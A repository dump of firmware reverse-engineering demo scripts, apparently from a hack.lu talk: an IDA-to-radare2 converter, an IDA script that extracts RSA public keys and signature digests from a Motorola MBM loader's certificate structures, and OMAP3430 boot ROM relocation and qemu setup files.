} 58 | else { 59 | // this is a Cache Type Register 60 | MakeComm(i, CP_CACHE_TYPE_REGISTER); 61 | } 62 | case "c1": 63 | case "c2": 64 | } 65 | case "c1": 66 | switch (instr_coprocessor_register2) { 67 | case "c0": 68 | case "c1": 69 | case "c2": 70 | } 71 | case "c2": 72 | case "c3": 73 | // Domain Access Control 74 | case "c5": 75 | 76 | case "c6": 77 | case "c7": 78 | case "c8": 79 | case "c9": 80 | case "c10": 81 | case "c11": 82 | case "c12": 83 | case "c13": 84 | case "c14": 85 | case "c15": 86 | default: 87 | Message("Wrong Coprocessor Register!\n"); 88 | } 89 | } 90 | i++; 91 | } 92 | } 93 | 94 | static main(void) { 95 | System_Control_Coprocessor(); 96 | 97 | } 98 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/idc2r.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # radare - LGPL - Copyright 2013 - xvilka 4 | 5 | import re 6 | import sys 7 | 8 | class Func(object): 9 | # FIXME: parse ftype into params and values 10 | def __init__(self, name="unknown", params=[], values=[], address=0, size=0, ftype=""): 11 | self.name = name 12 | self.params = params 13 | self.values = values 14 | self.address = address 15 | self.size = size 16 | self.ftype = ftype 17 | 18 | class Llabel(object): 19 | def __init__(self, name="unknown", address=0): 20 | self.name = name 21 | self.address = address 22 | 23 | class Comm(object): 24 | def __init__(self, text="", address=0): 25 | self.text = text 26 | self.address = address 27 | 28 | class Enum(object): 29 | def __init__(self, name="unknown", members=[]): 30 | self.name = name 31 | self.members = members 32 | 33 | class Struct(object): 34 | def __init__(self, name="unknown", members=[]): 35 | self.name = name 36 | self.members = members 37 | 38 | class Union(object): 39 | def __init__(self, name="unknown", members=[]): 40 | self.name = name 41 | self.members = members 42 | 43 | class 
Type(object): 44 | def __init__(self, name="unknown"): 45 | self.name = name 46 | self.members = members 47 | 48 | # ----------------------------------------------------------------------- 49 | 50 | functions = [] 51 | llabels = [] 52 | comments = [] 53 | structs = [] 54 | enums = [] 55 | types = [] 56 | 57 | def functions_parse(idc): 58 | 59 | # MakeFunction (0XF3C99,0XF3CA8); 60 | mkfun_re = re.compile(""" 61 | (?m) # Multiline 62 | ^[ \t]*MakeFunction[ \t]*\( 63 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 64 | [ \t]*\,[ \t]* 65 | (?P0[xX][\dA-Fa-f]{1,8}) # Function end 66 | [ \t]*\);[ \t]*$ 67 | """, re.VERBOSE) 68 | mkfun_group_name = dict([(v,k) for k,v in mkfun_re.groupindex.items()]) 69 | mkfun = mkfun_re.finditer(idc) 70 | for match in mkfun : 71 | fun = Func() 72 | for group_index,group in enumerate(match.groups()) : 73 | if group : 74 | if mkfun_group_name[group_index+1] == "fstart" : 75 | fun.address = int(group, 16) 76 | if mkfun_group_name[group_index+1] == "fend" : 77 | fun.size = int(group, 16) - fun.address 78 | 79 | functions.append(fun) 80 | 81 | # SetFunctionFlags (0XF3C99, 0x400); 82 | mkfunflags_re = re.compile(""" 83 | (?m) # Multiline 84 | ^[ \t]*SetFunctionFlags[ \t*]\( 85 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 86 | [ \t]*\,[ \t]* 87 | (?P0[xX][\dA-Fa-f]{1,8}) # Flags 88 | [ \t]*\);[ \t]*$ 89 | """, re.VERBOSE) 90 | mkfunflags_group_name = dict([(v,k) for k,v in mkfunflags_re.groupindex.items()]) 91 | mkfunflags = mkfunflags_re.finditer(idc) 92 | for match in mkfunflags : 93 | for group_index,group in enumerate(match.groups()) : 94 | if group : 95 | if mkfunflags_group_name[group_index+1] == "fstart" : 96 | addr = int(group, 16) 97 | if mkfunflags_group_name[group_index+1] == "flags" : 98 | for fun in functions : 99 | if fun.address == addr : 100 | pass # TODO: parse flags 101 | 102 | 103 | # MakeFrame (0XF3C99, 0, 0, 0); 104 | # MakeName (0XF3C99, "SIO_port_setup_S"); 105 | mkname_re = re.compile(""" 106 | (?m) # Multiline 107 | ^[ 
\t]*MakeName[ \t]*\( 108 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 109 | [ \t]*\,[ \t]* 110 | "(?P.*)" # Function name 111 | [ \t]*\);[ \t]*$ 112 | """, re.VERBOSE) 113 | mkname_group_name = dict([(v,k) for k,v in mkname_re.groupindex.items()]) 114 | mkname = mkname_re.finditer(idc) 115 | for match in mkname : 116 | for group_index,group in enumerate(match.groups()) : 117 | if group : 118 | if mkname_group_name[group_index+1] == "fstart" : 119 | addr = int(group, 16) 120 | if mkname_group_name[group_index+1] == "fname" : 121 | for fun in functions : 122 | if fun.address == addr : 123 | fun.name = group 124 | 125 | # SetType (0XFFF72, "__int32 __cdecl PCI_ByteWrite_SL(__int32 address, __int32 value)"); 126 | mkftype_re = re.compile(""" 127 | (?m) # Multiline 128 | ^[ \t]*SetType[ \t]*\( 129 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 130 | [ \t]*\,[ \t]* 131 | "(?P.*)" # Function type 132 | [ \t]*\);[ \t]*$ 133 | """, re.VERBOSE) 134 | mkftype_group_name = dict([(v,k) for k,v in mkftype_re.groupindex.items()]) 135 | mkftype = mkftype_re.finditer(idc) 136 | for match in mkftype : 137 | for group_index,group in enumerate(match.groups()) : 138 | if group : 139 | if mkftype_group_name[group_index+1] == "fstart" : 140 | addr = int(group, 16) 141 | if mkftype_group_name[group_index+1] == "ftype" : 142 | for fun in functions : 143 | if fun.address == addr : 144 | fun.ftype = group 145 | 146 | # MakeNameEx (0xF3CA0, "return", SN_LOCAL); 147 | mklocal_re = re.compile(""" 148 | (?m) # Multiline 149 | ^[ \t]*MakeNameEx[ \t]*\( 150 | (?P0[xX][\dA-Fa-f]{1,8}) # Local label address 151 | [ \t]*\,[ \t]* 152 | "(?P.*)" # Local label name 153 | [ \t]*\,[ \t]*SN_LOCAL 154 | [ \t]*\);[ \t]*$ 155 | """, re.VERBOSE) 156 | mklocal_group_name = dict([(v,k) for k,v in mklocal_re.groupindex.items()]) 157 | mklocal = mklocal_re.finditer(idc) 158 | for match in mklocal : 159 | lab = Llabel() 160 | for group_index,group in enumerate(match.groups()) : 161 | if group : 162 | if 
mklocal_group_name[group_index+1] == "laddr" : 163 | lab.address = int(group, 16) 164 | if mklocal_group_name[group_index+1] == "lname" : 165 | lab.name = group 166 | llabels.append(lab) 167 | 168 | # ---------------------------------------------------------------------- 169 | 170 | def enums_parse(idc): 171 | pass 172 | 173 | # ---------------------------------------------------------------------- 174 | 175 | def structs_parse(idc): 176 | # id = AddStrucEx (-1, "struct_MTRR", 0); 177 | mkstruct_re = re.compile(""" 178 | (?m) # Multiline 179 | ^[ \t]*id[ \t]*=[ \t]*AddStrucEx[ \t]*\( 180 | [ \t]*-1[ \t]*,[ \t]* 181 | "(?P.*)" # Structure name 182 | [ \t]*\,[ \t]*0 183 | [ \t]*\);[ \t]*$ 184 | """, re.VERBOSE) 185 | mkstruct_group_name = dict([(v,k) for k,v in mkstruct_re.groupindex.items()]) 186 | mkstruct = mkstruct_re.finditer(idc) 187 | for match in mkstruct : 188 | s = Struct() 189 | for group_index,group in enumerate(match.groups()) : 190 | if group : 191 | if mkstruct_group_name[group_index+1] == "sname" : 192 | s.name = group 193 | structs.append(s) 194 | 195 | # Case 1: not nested structures 196 | # ============================= 197 | # id = GetStrucIdByName ("struct_header"); 198 | # mid = AddStructMember(id,"BCPNV", 0, 0x5000c500, 0, 7); 199 | # mid = AddStructMember(id,"_", 0X7, 0x00500, -1, 1); 200 | # mid = AddStructMember(id, "BCPNV_size",0X8, 0x004500, -1, 1); 201 | mkstruct_re = re.compile(""" 202 | (?m) # Multiline 203 | ^[ \t]*id[ \t]*=[ \t]*GetStrucIdByName[ \t]*\( 204 | [ \t]*-1[ \t]*,[ \t]* 205 | "(?P.*)" # Structure name 206 | [ \t]*\,[ \t]*0 207 | [ \t]*\);[ \t]*$ 208 | """, re.VERBOSE) 209 | 210 | # ---------------------------------------------------------------------- 211 | 212 | def comments_parse(idc): 213 | # MakeComm (0XFED3D, "PCI class 0x600 - Host/PCI bridge"); 214 | mkcomm_re = re.compile(""" 215 | (?m) # Multiline 216 | ^[ \t]*MakeComm[ \t]*\( 217 | (?P0[xX][\dA-Fa-f]{1,8}) # Comment address 218 | [ \t]*\,[ \t]* 219 | "(?P.*)" # 
Comment 220 | [ \t]*\);[ \t]*$ 221 | """, re.VERBOSE) 222 | mkcomm_group_name = dict([(v,k) for k,v in mkcomm_re.groupindex.items()]) 223 | mkcomm = mkcomm_re.finditer(idc) 224 | for match in mkcomm : 225 | for group_index,group in enumerate(match.groups()) : 226 | if group : 227 | if mkcomm_group_name[group_index+1] == "caddr" : 228 | address = int(group, 16) 229 | if mkcomm_group_name[group_index+1] == "ctext" : 230 | com_multi = group.split('\\n') 231 | for a in com_multi : 232 | com = Comm() 233 | com.address = address 234 | com.text = a 235 | comments.append(com) 236 | 237 | # ---------------------------------------------------------------------- 238 | 239 | # print("af+ 0x%08lx %d %s" % (func.address, func.size, func.name)) 240 | 241 | def generate_r2(): 242 | for f in functions : 243 | if f.name != "unknown" : 244 | print("af+ {0} {1} {2}".format(hex(f.address), f.size, f.name)) 245 | print("\"CCa {0} {1}\"".format(hex(f.address), f.ftype)) 246 | 247 | for l in llabels : 248 | if l.name != "unknown" : 249 | for f in functions : 250 | if (l.address > f.address) and (l.address < (f.address + f.size)) : 251 | print("f. 
{0} @ {1}".format(l.name, hex(l.address))) 252 | 253 | for c in comments : 254 | if c.text != "" : 255 | print("\"CCa {0} {1}\"".format(c.address, c.text)) 256 | 257 | # ---------------------------------------------------------------------- 258 | 259 | def idc_parse(idc): 260 | enums_parse(idc) 261 | structs_parse(idc) 262 | functions_parse(idc) 263 | comments_parse(idc) 264 | generate_r2() 265 | 266 | if __name__ == "__main__": 267 | if len(sys.argv) < 2: 268 | print("Usage: idc2r.py input.idc > output.r2") 269 | sys.exit(1) 270 | 271 | #print(sys.argv[1]) 272 | idc_file = open(sys.argv[1], "r") 273 | idc = idc_file.read() 274 | idc_parse(idc) 275 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/mbmloader-1.raw: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/motorola-crypto.py: -------------------------------------------------------------------------------- 1 | import idaapi 2 | import idautils 3 | import idc 4 | 5 | import math 6 | from M2Crypto import BIO, RSA, EVP 7 | from pyasn1.codec.der import decoder 8 | 9 | # Key generation: 10 | # openssl genrsa -out rsatest.key 1024 11 | # openssl rsa -in rsatest.key -pubout -out rsatest.pub 12 | # openssl rsa -modulus -in rsatest.key 13 | 14 | def big_endian(n): 15 | s = '%x' % n 16 | if len(s) & 1: 17 | s = '0' + s 18 | return s.decode('hex') 19 | 20 | def construct_public_key(public_exponent, modulus, key_size): 21 | 22 | # N_PREFIX depends on key length 23 | #key_size = math.trunc(math.log(modulus, 2)) + 1 24 | 25 | if key_size == 256 : 26 | N_PREFIX = '\x00\x00\x00\x00' 27 | elif key_size == 512 : 28 | N_PREFIX = '\x00\x00\x00A\x00' 29 | elif key_size == 1024 : 30 | N_PREFIX = '\x00\x00\x00\x81\x00' 31 | elif (key_size == 2048) | (key_size == 2047) : 32 | N_PREFIX = '\x00\x00\x01\x01\x00' 33 | elif 
key_size == 4096 : 34 | N_PREFIX = '\x00\x00\x02\x01\x00' 35 | else : 36 | N_PREFIX = '\x00\x00\x00\x00' 37 | 38 | # E_PREFIX depends on E value 39 | 40 | if public_exponent == 65537 : 41 | E_PREFIX = '\x00\x00\x00\x03' 42 | elif public_exponent == 3 : 43 | E_PREFIX = '\x00\x00\x00\x01' 44 | else : 45 | E_PREFIX = '\x00\x00\x00\x00' 46 | 47 | e = E_PREFIX + big_endian(public_exponent) 48 | n = N_PREFIX + big_endian(modulus) 49 | key = RSA.new_pub_key((e,n)) 50 | return key 51 | 52 | # 1. Found all certificates and digests in file 53 | # 2. Try recognize them with the structure and ASN1 parser 54 | # 3. List them and provide address 55 | # 4. Mark them as structures 56 | # 5. Make PEM and DER formats of all of them 57 | 58 | def parse_structures(): 59 | 60 | # Searching structures, and if not exists - creating them 61 | 62 | # RSA KEY structure 63 | 64 | rsa_key = idc.GetStrucIdByName("rsa_key") 65 | rsa_key_str = """ struct rsa_key { 66 | long key_id; 67 | long key_type; 68 | long key_rights; 69 | long modul_length; 70 | long e_value; 71 | char modul[256]; 72 | }; """ 73 | if rsa_key == -1: 74 | rsa_key = idc.AddStrucEx(-1, "rsa_key", 0) 75 | idc.AddStrucMember(rsa_key, "key_id", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 76 | idc.AddStrucMember(rsa_key, "key_type", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 77 | idc.AddStrucMember(rsa_key, "key_rights", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 78 | idc.AddStrucMember(rsa_key, "modul_length", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 79 | idc.AddStrucMember(rsa_key, "e_value", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 80 | idc.AddStrucMember(rsa_key, "modul", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 256) 81 | 82 | # RSA ASN1 DIGEST structure 83 | 84 | rsa_asn1_digest = idc.GetStrucIdByName("rsa_asn1_digest") 85 | rsa_asn1_digest_str = """ struct rsa_asn1_digest { 86 | char signer_info[16]; 87 | long signature_info; 88 | long key_id; 89 | char digest[256]; 90 | }; """ 91 | if rsa_asn1_digest == -1: 92 | rsa_asn1_digest = 
idc.AddStrucEx(-1, "rsa_asn1_digest", 0) 93 | idc.AddStrucMember(rsa_asn1_digest, "signer_info", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 16) 94 | idc.AddStrucMember(rsa_asn1_digest, "signature_info", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 95 | idc.AddStrucMember(rsa_asn1_digest, "key_id", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 96 | idc.AddStrucMember(rsa_asn1_digest, "digest", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 256) 97 | 98 | # Cert PK - Public Keys structure 99 | 100 | certpk_struct = idc.GetStrucIdByName("Cert_Public") 101 | certpk_str = """ struct certpk { 102 | char cert_mark[8]; 103 | long cert_version; 104 | long cert_type; 105 | long minver_pk; 106 | long minver_ppa; 107 | long minver_rd1; 108 | long minver_rd2; 109 | long minver_isw; 110 | long minver_ki; 111 | long minver_pau; 112 | long minver_pas; 113 | long unkn1; 114 | struct { 115 | long key_id; 116 | long key_type; 117 | long key_rights; 118 | long modul_length; 119 | long e_value; 120 | char modul[256]; 121 | } root_key; 122 | long keys_active; 123 | struct { 124 | long key_id; 125 | long key_type; 126 | long key_rights; 127 | long modul_length; 128 | long e_value; 129 | char modul[256]; 130 | } key_02; 131 | struct { 132 | long key_id; 133 | long key_type; 134 | long key_rights; 135 | long modul_length; 136 | long e_value; 137 | char modul[256]; 138 | } key_03; 139 | struct { 140 | long key_id; 141 | long key_type; 142 | long key_rights; 143 | long modul_length; 144 | long e_value; 145 | char modul[256]; 146 | } key_04; 147 | struct { 148 | long key_id; 149 | long key_type; 150 | long key_rights; 151 | long modul_length; 152 | long e_value; 153 | char modul[256]; 154 | } key_05; 155 | struct { 156 | long key_id; 157 | long key_type; 158 | long key_rights; 159 | long modul_length; 160 | long e_value; 161 | char modul[256]; 162 | } key_06; 163 | struct { 164 | long key_id; 165 | long key_type; 166 | long key_rights; 167 | long modul_length; 168 | long e_value; 169 | char modul[256]; 170 | } 
key_07; 171 | long rights; 172 | long msv_mask; 173 | char zero_hole_2[120]; 174 | struct { 175 | char signer_info[16]; 176 | long signature_info; 177 | long key_id; 178 | char digest[256]; 179 | } digest; 180 | };""" 181 | if certpk_struct == -1: 182 | certpk_struct = idc.AddStrucEx(-1, "Cert_Public", 0) 183 | idc.AddStrucMember(certpk_struct, "cert_mark", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 8) 184 | idc.AddStrucMember(certpk_struct, "cert_version", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 185 | idc.AddStrucMember(certpk_struct, "cert_type", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 186 | idc.AddStrucMember(certpk_struct, "minver_pk", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 187 | idc.AddStrucMember(certpk_struct, "minver_ppa", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 188 | idc.AddStrucMember(certpk_struct, "minver_rd1", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 189 | idc.AddStrucMember(certpk_struct, "minver_rd2", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 190 | idc.AddStrucMember(certpk_struct, "minver_isw", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 191 | idc.AddStrucMember(certpk_struct, "minver_ki", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 192 | idc.AddStrucMember(certpk_struct, "minver_pau", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 193 | idc.AddStrucMember(certpk_struct, "minver_pas", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 194 | idc.AddStrucMember(certpk_struct, "unkn1", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 195 | idc.AddStrucMember(certpk_struct, "root_key", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 196 | idc.AddStrucMember(certpk_struct, "keys_active", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 197 | idc.AddStrucMember(certpk_struct, "key_02", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 198 | idc.AddStrucMember(certpk_struct, "key_03", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 199 | idc.AddStrucMember(certpk_struct, "key_04", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 200 | idc.AddStrucMember(certpk_struct, "key_05", -1, 
0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 201 | idc.AddStrucMember(certpk_struct, "key_06", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 202 | idc.AddStrucMember(certpk_struct, "key_07", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 203 | idc.AddStrucMember(certpk_struct, "rights", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 204 | idc.AddStrucMember(certpk_struct, "msv_mask", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 205 | idc.AddStrucMember(certpk_struct, "zero_hole_2", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 120) 206 | idc.AddStrucMember(certpk_struct, "digest", -1, 0x60000400, rsa_asn1_digest, idc.GetStrucSize(rsa_asn1_digest)) 207 | 208 | # CertPPA - Primary Protected Application Certificate structure 209 | 210 | certppa_struct = idc.GetStrucIdByName("Cert_Primary") 211 | certppa_str = """ struct certppa { 212 | char cert_mark[8]; 213 | long cert_version; 214 | long cert_type; 215 | long minver_src; 216 | long minver_pk; 217 | long minver_ppa; 218 | long minver_rd1; 219 | long minver_rd2; 220 | long minver_isw; 221 | struct { 222 | int image_offset; 223 | int image_size; 224 | int data_byte[5]; 225 | } images[4]; 226 | char zero_hole[128]; 227 | struct { 228 | char signer_info[16]; 229 | long signature_info; 230 | long key_id; 231 | char digest[256]; 232 | } digest; 233 | };""" 234 | if certppa_struct == -1: 235 | certppa_struct = idc.AddStrucEx(-1, "Cert_Primary", 0) 236 | idc.AddStrucMember(certppa_struct, "cert_mark", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 8) 237 | idc.AddStrucMember(certppa_struct, "cert_version", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 238 | idc.AddStrucMember(certppa_struct, "cert_type", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 239 | idc.AddStrucMember(certppa_struct, "minver_src", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 240 | idc.AddStrucMember(certppa_struct, "minver_pk", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 241 | idc.AddStrucMember(certppa_struct, "minver_ppa", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 242 | 
idc.AddStrucMember(certppa_struct, "minver_rd1", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 243 | idc.AddStrucMember(certppa_struct, "minver_rd2", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 244 | idc.AddStrucMember(certppa_struct, "minver_isw", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 245 | idc.AddStrucMember(certppa_struct, "images", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 21) 246 | idc.AddStrucMember(certppa_struct, "zero_hole", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 128) 247 | idc.AddStrucMember(certppa_struct, "digest", -1, 0x60000400, rsa_asn1_digest, idc.GetStrucSize(rsa_asn1_digest)) 248 | 249 | # CertISW - Initial Software Certificate structure 250 | 251 | certisw_struct = idc.GetStrucIdByName("Cert_ISW") 252 | certisw_str = """struct certisw { 253 | char cert_mark[8]; 254 | int cert_version; 255 | int cert_type; 256 | int minver_src; 257 | int minver_pk; 258 | int minver_ppa; 259 | int minver_rd1; 260 | int minver_rd2; 261 | int minver_isw; 262 | int watchdog_param; 263 | int use_DMA; 264 | int active_images; 265 | struct { 266 | int image_offset; 267 | int image_size; 268 | int data_byte[5]; 269 | } images[4]; 270 | int magic_1; 271 | int reg_bitfield; 272 | struct { 273 | int reg_address; 274 | int reg_value; 275 | } reg_table[32]; 276 | int reg_type_01; 277 | int reg_type_02; 278 | int entry_point_offset; 279 | int zero_hole[32]; 280 | struct { 281 | char signer_info[16]; 282 | long signature_info; 283 | long key_id; 284 | char digest[256]; 285 | } digest; 286 | };""" 287 | 288 | mbmloader_hdr_str = """struct mbmloader_head { 289 | void *entry_point; 290 | int anonymous_0; 291 | void *anonymous_1; 292 | void *anonymous_2; 293 | void *anonymous_3; 294 | void *anonymous_4; 295 | int anonymous_5; 296 | int field_1C; 297 | void *anonymous_7; 298 | int field_24; 299 | void *anonymous_8; 300 | int anonymous_9; 301 | int ruler[4]; 302 | char srk_part_1[128]; 303 | int srk_1; 304 | void *srk_1_pointer; 305 | int field_C8; 306 | int field_CC; 307 | char 
srk_part_2[128]; 308 | int srk_2; 309 | void *srk_2_pointer; 310 | int field_158; 311 | int field_15C; 312 | char sha_160_hash[20]; 313 | };""" 314 | 315 | # Searching main structures marks 316 | 317 | start = idc.MinEA() 318 | stop = idc.MaxEA() 319 | certpk_addr = idaapi.find_binary(start, stop, "43 65 72 74 50 4B 5F 00", 0, 0) # "CertPK_" string 320 | print "Found CertPK at 0x%x" % certpk_addr 321 | certppa_addr = idaapi.find_binary(start, stop, "43 65 72 74 50 50 41 00", 0, 0) # "CertPPA" string 322 | print "Found CertPPA at 0x%x" % certppa_addr 323 | certisw_addr = idaapi.find_binary(start, stop, "43 65 72 74 49 53 57 00", 0, 0) # "CertISW" string 324 | print "Found CertISW at 0x%x" % certisw_addr 325 | 326 | # Apply structure types on Cert* addresses 327 | 328 | # Read Structures from such data 329 | 330 | # If type is not parsed already, then... 331 | if idc.ParseTypes("certpk;", idc.PT_SILENT) != 0: 332 | # ...define the type 333 | idc.ParseTypes(certpk_str, idc.PT_SILENT) 334 | 335 | if idc.ParseTypes("certppa;", idc.PT_SILENT) != 0: 336 | idc.ParseTypes(certppa_str, idc.PT_SILENT) 337 | 338 | if idc.ParseTypes("certisw;", idc.PT_SILENT) != 0: 339 | idc.ParseTypes(certisw_str, idc.PT_SILENT) 340 | 341 | certpk_ = idaapi.Appcall.typedobj("certpk;") 342 | certpk_read, certpk = certpk_.retrieve(idaapi.get_many_bytes(certpk_addr, certpk_.size)) 343 | 344 | certppa_ = idaapi.Appcall.typedobj("certppa;") 345 | certppa_read, certppa = certppa_.retrieve(idaapi.get_many_bytes(certppa_addr, certppa_.size)) 346 | 347 | certisw_ = idaapi.Appcall.typedobj("certisw;") 348 | certisw_read, certisw = certisw_.retrieve(idaapi.get_many_bytes(certisw_addr, certisw_.size)) 349 | 350 | # Make PEM keys 351 | if certpk_read == 1 : 352 | root_key = construct_public_key(certpk.root_key.e_value, int(certpk.root_key.modul[0:certpk.root_key.modul_length].encode("hex"), 16), certpk.root_key.modul_length * 8) 353 | root_key.save_key("root_key.pem") 354 | 355 | # TODO: add automatic 
export of all ACTIVE keys from certpk.active_keys 356 | pk_02 = construct_public_key(certpk.key_02.e_value, int(certpk.key_02.modul[0:certpk.key_02.modul_length].encode("hex"), 16), certpk.key_02.modul_length * 8) 357 | pk_02.save_key("pk_02.pem") 358 | pk_03 = construct_public_key(certpk.key_03.e_value, int(certpk.key_03.modul[0:certpk.key_03.modul_length].encode("hex"), 16), certpk.key_03.modul_length * 8) 359 | pk_03.save_key("pk_03.pem") 360 | pk_04 = construct_public_key(certpk.key_04.e_value, int(certpk.key_04.modul[0:certpk.key_04.modul_length].encode("hex"), 16), certpk.key_04.modul_length * 8) 361 | pk_04.save_key("pk_04.pem") 362 | else : 363 | print "CertPK read fail!" 364 | 365 | # Verify digests 366 | if (certpk_read == 1) & (certppa_read == 1) & (certisw_read == 1) : 367 | certpk_digest = certpk.digest.digest.encode("hex") 368 | certppa_digest = certppa.digest.digest.encode("hex") 369 | certisw_digest = certisw.digest.digest.encode("hex") 370 | # pk_03.public_decrypt(certisw_digest, 1) 371 | # pk_03.verify(idaapi.get_many_bytes(certisw_addr, certisw_.size), certisw_digest, "sha1") 372 | # decoder.decode(certpk.digest.signer_info, ) 373 | print "CertPK signer info: %s " % certpk.digest.signer_info.encode("hex") 374 | print "CertPK digest: %s " % certpk.digest.digest.encode("hex") 375 | print "CertPPA signer info: %s " % certppa.digest.signer_info.encode("hex") 376 | print "CertPPA digest: %s " % certppa.digest.digest.encode("hex") 377 | print "CertISW signer info: %s " % certisw.digest.signer_info.encode("hex") 378 | print "CertISW digest: %s " % certisw.digest.digest.encode("hex") 379 | else : 380 | print "Certs processing fail!" 
381 | 382 | # TODO: Parse rights of the keys 383 | # TODO: Parse ASN1 from digests 384 | 385 | # Processing Images 386 | i = 0 387 | while i < 4 : 388 | print "images type %s " % type (certppa.images) 389 | if certppa.images[i].image_offset != 0 : 390 | print "Found PPA image at %x offset " % certppa.images[i].image_offset 391 | if certisw.images[i].image_offset != 0 : 392 | print "Found ISW image at %x offset " % certisw.images[i].image_offset 393 | i += 1 394 | 395 | # image start at certppa mark address + certppa.images[i].image_offset 396 | 397 | 398 | # Script body 399 | 400 | start = idc.MinEA() 401 | stop = idc.MaxEA() 402 | version_addr = idaapi.find_binary(start, stop, "43 65 72 74 49 53 57 00", 0, 0) + 0x79e # "CertISW" string 403 | version_minor = idaapi.get_byte(version_addr) 404 | version_major = idaapi.get_byte(version_addr + 1) 405 | print "MBM loader Major Version: %x " % version_major 406 | print "MBM loader Minor Version: %x " % version_minor 407 | parse_structures() 408 | 409 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/omap3430_boot_rom.idc: -------------------------------------------------------------------------------- 1 | #include 2 | // Relocate one segment 3 | static SegCopy(src, dest, size) 4 | { 5 | auto ea_src, ea_dest, hi_limit; 6 | hi_limit = src + size; 7 | ea_dest = dest; 8 | for(ea_src = src; ea_src < hi_limit ; ea_src = ea_src + 4 ) 9 | { 10 | PatchDword( ea_dest, Dword(ea_src)); 11 | ea_dest = ea_dest + 4; 12 | } 13 | Message("segment copy finished(inside SegCopy function)...\n"); 14 | } 15 | 16 | static main() 17 | { 18 | Message("creating target segment(inside entry point function main)...\n"); 19 | AddSeg(0x00014000, 0x0001C000, 0x00000000, 0, 0, 0); 20 | RenameSeg(0x00014000, "ROM_ORIG"); // Give a new name to the segment. 
21 | SegCopy(0x40014000, 0x00014000, 0x8000); 22 | } 23 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/omap3430_boot_rom.r2: -------------------------------------------------------------------------------- 1 | S 0 0x14000 0x8000 0x8000 explace rwx 2 | S 0 0x40014000 0x8000 0x8000 memplace rwx 3 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/omap3430_boot_rom_14.57.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo1_arm_boot/omap3430_boot_rom_14.57.idb -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/omap3430_boot_rom_14.57.lst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo1_arm_boot/omap3430_boot_rom_14.57.lst -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/omap_3430.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo1_arm_boot/omap_3430.bin -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/run_qemu.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | qemu-system-arm -s -S -M milestone -m 256 -L . 
